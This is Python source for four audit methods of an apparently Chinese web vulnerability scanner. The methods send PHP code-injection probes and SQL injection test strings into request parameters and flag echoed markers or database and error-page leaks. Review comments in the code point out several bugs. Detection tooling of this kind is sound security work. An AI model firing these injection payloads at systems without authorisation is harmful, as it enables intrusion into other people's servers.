    def audit(self):
        """Probe the request's parameters for PHP code evaluation.

        Skipped when the fingerprinted platform does not include PHP and
        ``conf.level`` is below 2. Every entry of ``_payloads`` is combined
        with each parameter position from ``generateItemdatas`` /
        ``paramsCombination`` and sent through ``self.req``. A finding is
        reported via ``self.success`` when the response body contains the
        expected marker (``verify_result``) or matches the PHP parse-error
        banner in ``regx``. Error-message leakage seen along the way is
        reported once more as a separate SENSITIVE finding.

        Returns:
            None. All findings are reported through ``self.success``.
        """
        if WEB_PLATFORM.PHP not in self.response.programing and conf.level < 2:
            return

        # PHP parse-error banner: a match suggests the injected text reached the
        # interpreter but left the statement syntactically unbalanced.
        regx = 'Parse error: syntax error,.*?\sin\s'
        randint = random.randint(5120, 10240)
        # Marker produced by the project's md5 helper; it is searched for as a
        # substring of the response text, so it is presumably a hex string.
        verify_result = md5(str(randint).encode())
        # NOTE(review): the "{}" placeholders below are never formatted with
        # `randint` in this listing, so `verify_result` cannot be echoed back
        # verbatim — confirm against the upstream source.
        _payloads = [
            "print(md5({}));",
            ";print(md5({}));",
            "';print(md5({}));$a='",
            "\";print(md5({}));$a=\"",
            "${{@print(md5({}))}}",
            "${{@print(md5({}))}}\\",
            "'.print(md5({})).'"
        ]
        # Load each injection position together with its original parameters.
        iterdatas = self.generateItemdatas()

        # First sensitive-error hit and the (key, value) it was observed with.
        errors = None
        errors_raw = ()
        # Combine the original parameters with each position into new payloads.
        for origin_dict, positon in iterdatas:
            payloads = self.paramsCombination(origin_dict, positon, _payloads)
            for key, value, new_value, payload in payloads:
                r = self.req(positon, payload)
                if not r:
                    continue
                html1 = r.text
                if verify_result in html1:
                    result = self.new_result()
                    result.init_info(self.requests.url, self.desc, VulType.CMD_INNJECTION)
                    result.add_detail("payload探测", r.reqinfo, generateResponse(r),
                                      "探测payload:{}并发现回显:{}".format(new_value, verify_result), key, value, positon)
                    self.success(result)
                    # Leaves only the inner loop; remaining positions are still probed.
                    break
                if re.search(regx, html1, re.I | re.S | re.M):
                    result = self.new_result()
                    result.init_info(self.requests.url, self.desc, VulType.CMD_INNJECTION)
                    result.add_detail("payload探测", r.reqinfo, generateResponse(r),
                                      "探测payload:{}并发现正则回显:{},可能是payload未闭合语句造成的错误".format(new_value, regx), key,
                                      value, positon)
                    self.success(result)
                    break
                # The sensitive-error scan runs only until its first hit.
                if not errors:
                    errors = sensitive_page_error_message_check(html1)
                    if errors:
                        errors_raw = (key, value)

            # NOTE(review): `r` here is whatever the last inner iteration left
            # behind — it may be falsy when the last request failed, unbound when
            # `payloads` was empty, or a response unrelated to `errors_raw` — and
            # `errors` is never reset, so this SENSITIVE result is re-reported for
            # every later position. Confirm whether that is intended.
            if errors:
                result = self.new_result()
                key, value = errors_raw
                result.init_info(self.requests.url, "敏感配置信息泄漏", VulType.SENSITIVE)
                for m in errors:
                    text = m["text"]
                    _type = m["type"]
                    result.add_detail("payload请求", r.reqinfo, generateResponse(r),
                                      "匹配组件:{} 匹配正则:{}".format(_type, text), key, value, positon)
                self.success(result)
    def audit(self):
        """Look for database error messages triggered by malformed parameter values.

        Each probe string is combined with every parameter position from
        ``generateItemdatas`` / ``paramsCombination`` and sent via ``self.req``.
        The first response that matches one of the ``Get_sql_errors`` patterns,
        or that ``sensitive_page_error_message_check`` flags, is reported
        through ``self.success`` and the scan stops.

        Returns:
            True once a finding has been reported; None otherwise.
        """
        num = random_num(4)
        s = random_str(4)
        # Comparison that is always false; reused by several probe strings.
        neq = "{}={}".format(num, num + 1)
        _payloads = [
            "鎈'\"\\(",
            "'", "')", "';",
            '"', '")', '";',
            " order By 500 ",
            "--", "-0",
            ") AND {} AND ({}={}".format(neq, num, num),
            " AND {}%23".format(neq),
            " %' AND {} AND '%'='".format(neq),
            " ') AND {} AND ('{}'='{}".format(neq, s, s),
            " ' AND {} AND '{}'='{}".format(neq, s, s),
            "`", "`)", "`;",
            "\\",
            "%27", "%%2727", "%25%27", "%60", "%5C",
            # NOTE(review): the next two entries format the `random_num`
            # callable itself, not a generated number — confirm intent.
            "extractvalue(1,concat(char(126),md5({})))".format(random_num),
            "convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))".format(random_num),
        ]

        def report(response, key, payload, positon, detail):
            # Record one SQLI finding for `response` and hand it to self.success.
            finding = self.new_result()
            finding.init_info(self.requests.url, "SQL注入", VulType.SQLI)
            finding.add_detail("payload探测", response.reqinfo, generateResponse(response),
                               detail, key, payload, positon)
            self.success(finding)

        # Each position is paired with its original parameters, then every probe
        # string is merged in to form the concrete requests.
        for origin_dict, positon in self.generateItemdatas():
            combos = self.paramsCombination(origin_dict, positon, _payloads)
            for key, value, new_value, payload in combos:
                r = self.req(positon, payload)
                if not r:
                    continue
                body = r.text

                for sql_regex, dbms_type in Get_sql_errors():
                    found = sql_regex.search(body)
                    if found is None:
                        continue
                    report(r, key, payload, positon,
                           "DBMS_TYPE:{} 匹配结果:{}".format(dbms_type, found.group()))
                    return True

                leaks = sensitive_page_error_message_check(body)
                if not leaks:
                    continue
                report(r, key, payload, positon,
                       "需要注意的报错信息:{}".format(repr(leaks)))
                return True
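    def audit(self):
        """Request a random, non-existent .jsp path and inspect the error page.

        Builds ``<scheme>://<netloc>/<random>.jsp`` from the scanned URL, fetches
        it with the original request headers, and runs
        ``sensitive_page_error_message_check`` over the response body. Every
        match is attached to one SENSITIVE finding that is reported through
        ``self.success``.

        Returns:
            None. Findings are reported through ``self.success``.

        Raises:
            requests.RequestException: propagated from ``requests.get`` when the
                probe request fails or times out.
        """
        headers = self.requests.headers
        parts = urlparse(self.requests.url)

        probe_url = "{}://{}/{}.jsp".format(parts.scheme, parts.netloc, random_str(6))
        # Bound the wait so a single unresponsive host cannot stall the whole
        # scan; the value is a constructed default — align it with the
        # project's configured request timeout if one exists.
        r = requests.get(probe_url, headers=headers, timeout=10)
        messages = sensitive_page_error_message_check(r.text)
        if not messages:
            return

        result = self.new_result()
        result.init_info(self.requests.url, "敏感的报错信息", VulType.SENSITIVE)
        for m in messages:
            text = m["text"]
            _type = m["type"]
            # NOTE(review): `reqinfo` is not a stock requests.Response
            # attribute; presumably the project patches it in — verify.
            result.add_detail("payload请求", r.reqinfo, generateResponse(r),
                              "匹配组件:{} 匹配正则:{}".format(_type, text), "",
                              "", PLACE.GET)

        self.success(result)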
    def audit(self):
        """Send a single malformed value and look for database error output.

        The probe string is combined with every parameter position from
        ``generateItemdatas`` / ``paramsCombination`` and sent via ``self.req``.
        The first response matching one of the ``Get_sql_errors`` patterns is
        reported as "SQL注入"; otherwise a response flagged by
        ``sensitive_page_error_message_check`` is reported as
        "基于报错的SQL注入". Either report goes through ``self.success`` and
        ends the scan.

        Returns:
            True once a finding has been reported; None otherwise.
        """
        _payloads = ["鎈'\"\\("]

        def report(response, desc, key, payload, positon, detail):
            # Record one SQLI finding for `response` and hand it to self.success.
            finding = self.new_result()
            finding.init_info(self.requests.url, desc, VulType.SQLI)
            finding.add_detail("payload探测", response.reqinfo, generateResponse(response),
                               detail, key, payload, positon)
            self.success(finding)

        # Each position is paired with its original parameters, then the probe
        # string is merged in to form the concrete requests.
        for origin_dict, positon in self.generateItemdatas():
            combos = self.paramsCombination(origin_dict, positon, _payloads)
            for key, value, new_value, payload in combos:
                r = self.req(positon, payload)
                if not r:
                    continue
                body = r.text

                for sql_regex, dbms_type in Get_sql_errors():
                    found = sql_regex.search(body)
                    if found is None:
                        continue
                    report(r, "SQL注入", key, payload, positon,
                           "DBMS_TYPE:{} 匹配结果:{}".format(dbms_type, found.group()))
                    return True

                leaks = sensitive_page_error_message_check(body)
                if not leaks:
                    continue
                report(r, "基于报错的SQL注入", key, payload, positon,
                       "需要注意的报错信息:{}".format(repr(leaks)))
                return True